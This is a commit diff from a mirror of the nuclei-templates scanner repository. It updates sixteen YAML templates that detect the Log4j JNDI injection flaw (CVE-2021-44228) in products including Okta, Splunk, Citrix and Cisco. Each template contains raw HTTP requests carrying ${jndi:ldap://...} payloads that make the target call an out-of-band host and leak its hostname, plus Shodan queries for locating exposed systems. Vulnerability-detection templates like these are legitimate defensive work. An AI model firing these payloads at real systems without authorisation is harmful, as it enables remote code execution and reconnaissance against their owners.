daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

add metadata & lint fix

patch-1
Dhiyaneshwaran 2023-10-19 12:58:29 +05:30
parent a5debfb4aa
commit 777d9645ef
16 changed files with 114 additions and 88 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

11
http/vulnerabilities/other/cisco-broadworks-log4j-rce.yaml
View File

@ -2,7 +2,7 @@ id: cisco-broadworks-log4j-rce
info:
name: Cisco BroadWorks - Remote Code Execution (Apache Log4j)
author: shaikhyaser, yaser_s
author: shaikhyaser
severity: critical
description: |
Cisco BroadWorks is susceptible to Log4j JNDI remote code execution. Cisco BroadWorks is an enterprise-grade calling and collaboration platform delivering unmatched performance, security and scale.
@ -14,12 +14,14 @@ info:
cve-id: CVE-2021-44228
cwe-id: CWE-77
metadata:
verified: true
fofa-query: "Cisco BroadWorks"
max-request: 1
tags: cve,cve2021,rce,jndi,log4j,cisco,oast,kev
variables:
rand1: '{{rand_int(111, 999)}}'
rand2: '{{rand_int(111, 999)}}'
str: "{{rand_base(5)}}"
http:
- raw:
@ -27,11 +29,10 @@ http:
POST /commpilot/servlet/Login HTTP/1.1
Host: {{Hostname}}
Origin: {{RootURL}}
Referer: {{RootURL}}/
Referer: {{RootURL}}
Content-Type: application/x-www-form-urlencoded
Connection: close
domain=test.com&UserID=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}/test}&EnteredUserID=a&Password=a
domain={{str}}.com&UserID=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}/{{str}}}&EnteredUserID=a&Password=a
matchers-condition: and
matchers:

8
http/vulnerabilities/other/cisco-webex-log4j-rce.yaml
View File

@ -2,7 +2,7 @@ id: cisco-webex-log4j-rce
info:
name: Cisco WebEx - Remote Code Execution (Apache Log4j)
author: shaikhyaser, yaser_s
author: shaikhyaser
severity: critical
description: |
Cisco WebEx is susceptible to Log4j JNDI remote code execution. Cisco WebEx provides web conferencing, videoconferencing and contact center as a service applications.
@ -14,12 +14,14 @@ info:
cve-id: CVE-2021-44228
cwe-id: CWE-77
metadata:
verified: true
shodan-query: title:"Cisco WebEx"
max-request: 1
tags: cve,cve2021,rce,jndi,log4j,cisco,webex,oast,kev
variables:
rand1: '{{rand_int(111, 999)}}'
rand2: '{{rand_int(111, 999)}}'
str: "{{rand_base(5)}}"
http:
- raw:
@ -31,7 +33,7 @@ http:
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
type=getFailureTimes&username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}/test}&bAjax=true
type=getFailureTimes&username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}/{{str}}}&bAjax=true
matchers-condition: and
matchers:

8
http/vulnerabilities/other/citrix-xenapp-log4j-rce.yaml
View File

@ -2,7 +2,7 @@ id: citrix-xenapp-log4j-rce
info:
name: Citrix XenApp - Remote Code Execution (Apache Log4j)
author: shaikhyaser, yaser_s
author: shaikhyaser
severity: critical
description: |
Citrix XenApp is susceptible to Log4j JNDI remote code execution. Citrix Virtual Apps is an application virtualization software produced by Citrix Systems that allows Windows applications to be accessed via individual devices from a shared server or cloud system.
@ -14,12 +14,14 @@ info:
cve-id: CVE-2021-44228
cwe-id: CWE-77
metadata:
verified: true
shodan-query: html:"/citrix/xenapp"
max-request: 1
tags: cve,cve2021,rce,jndi,log4j,citrix,oast,kev
variables:
rand1: '{{rand_int(111, 999)}}'
rand2: '{{rand_int(111, 999)}}'
str: "{{rand_base(5)}}"
http:
- raw:
@ -31,7 +33,7 @@ http:
Referer: {{RootURL}}/Citrix/XenApp/auth/login.aspx?CTX_MessageType=WARNING&CTX_MessageKey=NoUsableClientDetected
Content-Type: application/x-www-form-urlencoded
LoginType=Explicit&user=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}/test}&password=a
LoginType=Explicit&user=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}/{{str}}}&password={{str}}
matchers-condition: and
matchers:

9
http/vulnerabilities/other/f-secure-policymanager-log4j-rce.yaml
View File

@ -2,10 +2,10 @@ id: f-secure-policymanager-log4j-rce
info:
name: F-Secure Policy Manager - Remote Code Execution (Apache Log4j)
author: shaikhyaser, yaser_s
author: shaikhyaser
severity: critical
description: |
F-Secure Policy Manager is susceptible to Log4j JNDI remote code execution.
F-Secure Policy Manager is susceptible to Log4j JNDI remote code execution.
reference:
- https://discuss.elastic.co/t/apache-log4j2-remote-code-execution-rce-vulnerability-cve-2021-44228-esa-2021-31/291476
classification:
@ -15,16 +15,19 @@ info:
cwe-id: CWE-77
metadata:
verified: true
shodan-query: html:"F-Secure Policy Manager"
max-request: 1
tags: cve,cve2021,rce,jndi,log4j,fsecure,oast,kev
variables:
rand1: '{{rand_int(111, 999)}}'
rand2: '{{rand_int(111, 999)}}'
str: "{{rand_base(5)}}"
http:
- raw:
- |
GET /fsms/fsmsh.dll?FSMSCommand=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}/test} HTTP/1.1
GET /fsms/fsmsh.dll?FSMSCommand=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}/{{str}}} HTTP/1.1
Host: {{Hostname}}
Referrer: {{RootURL}}

11
http/vulnerabilities/other/flexnet-log4j-rce.yaml
View File

@ -2,10 +2,10 @@ id: flexnet-log4j-rce
info:
name: Flexnet - Remote Code Execution (Apache Log4j)
author: shaikhyaser, yaser_s
author: shaikhyaser
severity: critical
description: |
Flexnet is susceptible to Log4j JNDI remote code execution.
Flexnet is susceptible to Log4j JNDI remote code execution.
reference:
- https://community.flexera.com/t5/Revenera-Company-News/Security-Advisory-Log4j-Java-Vulnerability-CVE-2021-4104-CVE/ba-p/216905
classification:
@ -14,12 +14,14 @@ info:
cve-id: CVE-2021-44228
cwe-id: CWE-77
metadata:
verified: true
shodan-query: title:"Flexnet"
max-request: 1
tags: cve,cve2021,rce,jndi,log4j,flexnet,oast,kev
variables:
rand1: '{{rand_int(111, 999)}}'
rand2: '{{rand_int(111, 999)}}'
str: "{{rand_base(5)}}"
http:
- raw:
@ -29,9 +31,8 @@ http:
Origin: {{RootURL}}
Referer: {{RootURL}}/flexnet/logon.do
Content-Type: application/x-www-form-urlencoded
Connection: close
action=logon&username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}/test}&password=a&domain=FLEXnet
action=logon&username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}/{{str}}}&password={{str}}&domain=FLEXnet
matchers-condition: and
matchers:

9
http/vulnerabilities/other/fortiportal-log4j-rce.yaml
View File

@ -2,7 +2,7 @@ id: fortiportal-log4j-rce
info:
name: FortiPortal - Remote Code Execution (Apache Log4j)
author: shaikhyaser, yaser_s
author: shaikhyaser
severity: critical
description: |
FortiPortal is susceptible to Log4j JNDI remote code execution. FortiPortal provides comprehensive security management and analytics within a multi-tenant, multi-tier management framework.
@ -14,12 +14,14 @@ info:
cve-id: CVE-2021-44228
cwe-id: CWE-77
metadata:
verified: true
max-request: 1
shodan-query: html:"FortiPortal"
tags: cve,cve2021,rce,jndi,log4j,fortiportal,oast,kev
variables:
rand1: '{{rand_int(111, 999)}}'
rand2: '{{rand_int(111, 999)}}'
str: "{{rand_base(5)}}"
http:
- raw:
@ -30,9 +32,8 @@ http:
Accept: application/json, text/plain, */*
Referer: {{RootURL}}/fpc/app/login
Content-Type: application/json
Connection: close
{"username":"${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}/test}","password":"aa","isAdmin":false,"locale":"${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}/test}"}
{"username":"${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}/{{str}}}","password":"{{str}}","isAdmin":false,"locale":"${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}/{{str}}}"}
matchers-condition: and
matchers:

11
http/vulnerabilities/other/jitsi-meet-log4j-rce.yaml
View File

@ -2,7 +2,7 @@ id: jitsi-meet-log4j-rce
info:
name: Jitsi Meet - Remote Code Execution (Apache Log4j)
author: shaikhyaser, yaser_s
author: shaikhyaser
severity: critical
description: |
Jitsi Meet is susceptible to Log4j JNDI remote code execution. Jitsi is a collection of free and open-source multiplatform voice, video conferencing and instant messaging applications for the Web platforms.
@ -14,23 +14,22 @@ info:
cve-id: CVE-2021-44228
cwe-id: CWE-77
metadata:
verified: true
shodan-query: title:"Jitsi Meet"
max-request: 1
tags: cve,cve2021,rce,jndi,log4j,jitsi,oast,kev
variables:
rand1: '{{rand_int(111, 999)}}'
rand2: '{{rand_int(111, 999)}}'
str: "{{rand_base(5)}}"
http:
- raw:
- |
GET /http-bind?room=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}/test} HTTP/1.1
GET /http-bind?room=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}/{{str}}} HTTP/1.1
Host: {{Hostname}}
Accept: /
Origin: {{RootURL}}
Referer: {{RootURL}}
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
matchers-condition: and
matchers:

8
http/vulnerabilities/other/logstash-log4j-rce.yaml
View File

@ -2,7 +2,7 @@ id: logstash-log4j-rce
info:
name: Logstash - Remote Code Execution (Apache Log4j)
author: shaikhyaser, yaser_s
author: shaikhyaser
severity: critical
description: |
Logstash is susceptible to Log4j JNDI remote code execution. Logstash is a free and open server-side data processing pipeline that ingests data from a multitude of sources, transforms it, and then sends it to your favorite "stash."
@ -14,17 +14,19 @@ info:
cve-id: CVE-2021-44228
cwe-id: CWE-77
metadata:
verified: true
max-request: 1
shodan-query: html:"logstash"
tags: cve,cve2021,rce,jndi,log4j,logstash,oast,kev
variables:
rand1: '{{rand_int(111, 999)}}'
rand2: '{{rand_int(111, 999)}}'
str: "{{rand_base(5)}}"
http:
- raw:
- |
GET /api/logstash/pipeline/${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}/test} HTTP/1.1
GET /api/logstash/pipeline/${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}/{{str}}} HTTP/1.1
Host: {{Hostname}}
Referrer: {{RootURL}}/app/management/ingest/pipelines/
Content-Type: application/json

8
http/vulnerabilities/other/manage-engine-dc-log4j-rce.yaml
View File

@ -2,7 +2,7 @@ id: manage-engine-dc-log4j-rce
info:
name: Manage Engine Desktop Central - Remote Code Execution (Apache Log4j)
author: shaikhyaser, yaser_s
author: shaikhyaser
severity: critical
description: |
Manage Engine Endpoint Central (formerly Desktop Central) is susceptible to Log4j JNDI remote code execution. Endpoint Central is a Unified Endpoint Management (UEM) & Endpoint protection suite that helps manage and secure various network devices
@ -14,12 +14,14 @@ info:
cve-id: CVE-2021-44228
cwe-id: CWE-77
metadata:
verified: true
shodan-query: title:"ManageEngine Desktop Central"
max-request: 1
tags: cve,cve2021,rce,jndi,log4j,manage,engine,oast,kev
variables:
rand1: '{{rand_int(111, 999)}}'
rand2: '{{rand_int(111, 999)}}'
str: "{{rand_base(5)}}"
http:
- raw:
@ -30,7 +32,7 @@ http:
Referer: {{RootURL}}/configurations
Content-Type: application/x-www-form-urlencoded
j_username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}/test}&j_password=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}/test}&otpTimeout=7&browserLocale=en_us&cacheNum=4&csrfPreventionSaltForFlashMessage=
j_username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}/{{str}}}&j_password=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}/{{str}}}&otpTimeout=7&browserLocale=en_us&cacheNum=4&csrfPreventionSaltForFlashMessage=
matchers-condition: and
matchers:

8
http/vulnerabilities/other/okta-log4j-rce.yaml
View File

@ -2,7 +2,7 @@ id: okta-log4j-rce
info:
name: Okta - Remote Code Execution (Apache Log4j)
author: shaikhyaser, yaser_s
author: shaikhyaser
severity: critical
description: |
Okta is susceptible to Log4j JNDI remote code execution. Okta provides cloud software that helps companies manage and secure user authentication into applications, and for developers to build identity controls into applications, website web services and devices.
@ -14,17 +14,19 @@ info:
cve-id: CVE-2021-44228
cwe-id: CWE-77
metadata:
verified: true
shodan-query: title:"Okta"
max-request: 1
tags: cve,cve2021,rce,jndi,log4j,okta,oast,kev
variables:
rand1: '{{rand_int(111, 999)}}'
rand2: '{{rand_int(111, 999)}}'
str: "{{rand_base(5)}}"
http:
- raw:
- |
GET /login/SAML?=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}/test} HTTP/1.1
GET /login/SAML?=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}/{{str}}} HTTP/1.1
Host: {{Hostname}}
matchers-condition: and

11
http/vulnerabilities/other/openshift-log4j-rce.yaml
View File

@ -2,7 +2,7 @@ id: openshift-log4j-rce
info:
name: OpenShift - Remote Code Execution (Apache Log4j)
author: shaikhyaser, yaser_s
author: shaikhyaser
severity: critical
description: |
OpenShift is susceptible to Log4j JNDI remote code execution. OpenShift is a unified platform to build, modernize, and deploy applications at scale.
@ -14,12 +14,14 @@ info:
cve-id: CVE-2021-44228
cwe-id: CWE-77
metadata:
verified: true
shodan-query: title:"OpenShift"
max-request: 1
tags: cve,cve2021,rce,jndi,log4j,openshift,oast,kev
variables:
rand1: '{{rand_int(111, 999)}}'
rand2: '{{rand_int(111, 999)}}'
str: "{{rand_base(5)}}"
http:
- raw:
@ -27,11 +29,10 @@ http:
POST /Login HTTP/1.1
Host: {{Hostname}}
Origin: {{RootURL}}
Referer: {{RootURL}}/login?then=%2Foauth%2Fauthorize%3Fclient_id%3Dopenshift-web-console%26idp%3Dbasic%26redirect_uri%3Dhttps%253A%252F%252F{{Hostname}}%252Fconsole%252Foauth%26response_type
Referer: {{RootURL}}/login?then=/oauth/authorize?client_id=openshift-web-console&idp=basic&redirect_uri={{BaseURL}}/console/oauth&response_type
Content-Type: application/x-www-form-urlencoded
Connection: close
then=%2Foauth%2Fauthorize%3Fclient_id%3Dopenshift-web-console%26idp%3Dbasic%26redirect_uri%3D${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}/test}26response_type%3Dcode&username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}/test}&password=aaa
then=%2Foauth%2Fauthorize%3Fclient_id%3Dopenshift-web-console%26idp%3Dbasic%26redirect_uri%3D${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}/{{str}}}26response_type%3Dcode&username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}/{{str}}}&password={{str}}
matchers-condition: and
matchers:

9
http/vulnerabilities/other/papercut-log4j-rce.yaml
View File

@ -2,7 +2,7 @@ id: papercut-log4j-rce
info:
name: Papercut - Remote Code Execution (Apache Log4j)
author: shaikhyaser, yaser_s
author: shaikhyaser
severity: critical
description: |
Papercut is susceptible to Log4j JNDI remote code execution. Papercut is a print management system.
@ -14,12 +14,14 @@ info:
cve-id: CVE-2021-44228
cwe-id: CWE-77
metadata:
verified: true
shodan-query: title:"Papercut"
max-request: 1
tags: cve,cve2021,rce,jndi,log4j,papercut,oast,kev
variables:
rand1: '{{rand_int(111, 999)}}'
rand2: '{{rand_int(111, 999)}}'
str: "{{rand_base(5)}}"
http:
- raw:
@ -29,9 +31,8 @@ http:
Origin: {{RootURL}}
Referer: {{RootURL}}/app
Content-Type: application/x-www-form-urlencoded
Connection: close
service=direct%2F1%2FHome%2F%24Form&sp=S0&Form0=%24Hidden%240%2C%24Hidden%241%2CinputUsername%2CinputPassword%2C%24Submit%240%2C%24PropertySelection&%24Hidden%240=true&%24Hidden%241=X&inputUsername=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}/test}&inputPassword=a&%24Submit%240=Log+in&%24PropertySelection=en
service=direct%2F1%2FHome%2F%24Form&sp=S0&Form0=%24Hidden%240%2C%24Hidden%241%2CinputUsername%2CinputPassword%2C%24Submit%240%2C%24PropertySelection&%24Hidden%240=true&%24Hidden%241=X&inputUsername=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}/{{str}}}&inputPassword=a&%24Submit%240=Log+in&%24PropertySelection=en
matchers-condition: and
matchers:

27
http/vulnerabilities/other/pega-log4j-rce.yaml
View File

@ -2,7 +2,7 @@ id: pega-log4j-rce
info:
name: Pega - Remote Code Execution (Apache Log4j)
author: shaikhyaser, yaser_s
author: shaikhyaser
severity: critical
description: |
Pega is susceptible to Log4j JNDI remote code execution. Pega provides a powerful low-code platform that empowers the world's leading enterprises to Build for Change.
@ -14,24 +14,30 @@ info:
cve-id: CVE-2021-44228
cwe-id: CWE-77
metadata:
verified: true
shodan-query: title:"Pega"
max-request: 1
tags: cve,cve2021,rce,jndi,log4j,pega,oast,kev
variables:
rand1: '{{rand_int(111, 999)}}'
rand2: '{{rand_int(111, 999)}}'
str: "{{rand_base(5)}}"
http:
- raw:
- |
POST /prweb/app/default/_56mEsR4RqBouCrZGfkkFF8v406BUOZt/!STANDARD HTTP/1.1
GET /prweb/ HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
- |
POST {{location}} HTTP/1.1
Host: {{Hostname}}
Origin: {{RootURL}}
Referer: {{RootURL}}/prweb/app/default/_56mEsR4RqBouCrZGfkkFF8v406BUOZt*/!STANDARD
Referer: {{location}}
Content-Type: application/x-www-form-urlencoded
Connection: close
pzAuth=guest&UserIdentifier=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}/test}&Password=a&pyActivity%3DCode-Security.Login=&lockScreenID=&lockScreenPassword=&newPassword=&confirmNewPassword=
pzAuth=guest&UserIdentifier=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}/{{str}}}&Password=a&pyActivity%3DCode-Security.Login=&lockScreenID=&lockScreenPassword=&newPassword=&confirmNewPassword=
matchers-condition: and
matchers:
@ -60,4 +66,11 @@ http:
group: 1
regex:
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
part: interactsh_request
part: interactsh_request
- type: kval
kval:
- location
internal: true
name: location
part: header_1

29
http/vulnerabilities/other/sonicwall-nsm-log4j-rce.yaml
View File

@ -2,7 +2,7 @@ id: sonicwall-nsm-log4j-rce
info:
name: Sonicwall NSM - Remote Code Execution (Apache Log4j)
author: shaikhyaser, yaser_s
author: shaikhyaser
severity: critical
description: |
Sonicwall NSM is susceptible to Log4j JNDI remote code execution. SonicWall Network Security Manager (NSM) allows you to centrally orchestrate all firewall operations error-free, see and manage threats and risks across your firewall ecosystem from one place, and stay connected and compliant.
@ -14,12 +14,14 @@ info:
cve-id: CVE-2021-44228
cwe-id: CWE-77
metadata:
verified: true
shodan-query: title:"SonicWall Network Security"
max-request: 1
tags: cve,cve2021,rce,jndi,log4j,soniwall,oast,kev
tags: cve,cve2021,rce,jndi,log4j,sonicwall,oast,kev
variables:
rand1: '{{rand_int(111, 999)}}'
rand2: '{{rand_int(111, 999)}}'
str: "{{rand_base(5)}}"
http:
- raw:
@ -27,15 +29,14 @@ http:
POST /api/sonicos/auth HTTP/1.1
Host: {{Hostname}}
X-Snwl-Timer: no-reset
Authorization: Digest username="${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}/test}", realm="admin-users@x.x.x.x", uri="/api/sonicos/auth", algorithm=SHA-256
Authorization: Digest username="${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}/}", realm="admin-users@x.x.x.x", uri="/api/sonicos/auth", algorithm=SHA-256
Content-Type: application/json
Accept: application/json, text/plain, /
X-Snwl-Api-Scope: extended
Origin: {{RootURL}}
Referer: {{RootURL}}/
Connection: close
Referer: {{RootURL}}
{"override":false,"snwl":"${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}/test}"}
{"override":false,"snwl":"${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}/{{str}}}"}
matchers-condition: and
matchers:
@ -47,25 +48,21 @@ http:
- type: regex
part: interactsh_request
regex:
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
extractors:
- type: kval
kval:
- interactsh_ip
- interactsh_ip
- interactsh_ip # Print remote interaction IP in output
- type: regex
group: 2
regex:
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
part: interactsh_request
- type: regex
group: 1
regex:
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'
part: interactsh_request
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
part: interactsh_request

25
http/vulnerabilities/other/splunk-enterprise-log4j-rce.yaml
View File

@ -2,7 +2,7 @@ id: splunk-enterprise-log4j-rce
info:
name: Splunk Enterprise - Remote Code Execution (Apache Log4j)
author: shaikhyaser, yaser_s
author: shaikhyaser
severity: critical
description: |
Splunk Enterprise is susceptible to Log4j JNDI remote code execution. Splunk Enterprise enables you to search, analyze and visualize your data to quickly act on insights from across your technology landscape.
@ -14,12 +14,14 @@ info:
cve-id: CVE-2021-44228
cwe-id: CWE-77
metadata:
verified: true
shodan-query: http.title:"Login - Splunk"
max-request: 1
tags: cve,cve2021,rce,jndi,log4j,splunk,oast,kev
variables:
rand1: '{{rand_int(111, 999)}}'
rand2: '{{rand_int(111, 999)}}'
str: "{{rand_base(5)}}"
http:
- raw:
@ -29,11 +31,10 @@ http:
Accept: text/javascript, text/html, application/xml, text/xml, /
X-Requested-With: XMLHttpRequest
Origin: {{RootURL}}
Referer: {{RootURL}}/
Referer: {{RootURL}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Connection: close
cval={{unix_time()}}&username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}/test}&password=a&return_to=%2Fen-US%2F
cval={{unix_time()}}&username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}/{{str}}}&password={{str}}&return_to=%2Fen-US%2F
matchers-condition: and
matchers:
@ -45,25 +46,21 @@ http:
- type: regex
part: interactsh_request
regex:
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
extractors:
- type: kval
kval:
- interactsh_ip
- interactsh_ip
- interactsh_ip # Print remote interaction IP in output
- type: regex
group: 2
regex:
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
part: interactsh_request
- type: regex
group: 1
regex:
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'
part: interactsh_request
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
part: interactsh_request

10
http/vulnerabilities/other/symantec-sepm-log4j-rce.yaml
View File

@ -2,7 +2,7 @@ id: symantec-sepm-log4j-rce
info:
name: Symantec SEPM - Remote Code Execution (Apache Log4j)
author: shaikhyaser, yaser_s
author: shaikhyaser
severity: critical
description: |
Symantec SPEM is susceptible to Log4j JNDI remote code execution.
@ -14,12 +14,14 @@ info:
cve-id: CVE-2021-44228
cwe-id: CWE-77
metadata:
verified: true
shodan-query: title:"Symantec Endpoint Protection Manager"
max-request: 1
tags: cve,cve2021,rce,jndi,log4j,symantec,oast,kev
variables:
rand1: '{{rand_int(111, 999)}}'
rand2: '{{rand_int(111, 999)}}'
str: "{{rand_base(5)}}"
http:
- raw:
@ -32,7 +34,7 @@ http:
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
actionString=%2Fnoupdate%2FSEPMPasswordField_118937502%2F&storedActions%5B%5D=%2Ftype%2FSEPMPasswordField_118937502%2F${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}/test}&__Action=v4&__FastSubmit=true
actionString=%2Fnoupdate%2FSEPMPasswordField_{{field}}%2F&storedActions%5B%5D=%2Ftype%2FSEPMPasswordField_{{field}}%2F${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}/{{str}}}&__Action=v4&__FastSubmit=true
matchers-condition: and
matchers:
@ -61,4 +63,4 @@ http:
group: 1
regex:
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' #Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
part: interactsh_request
part: interactsh_request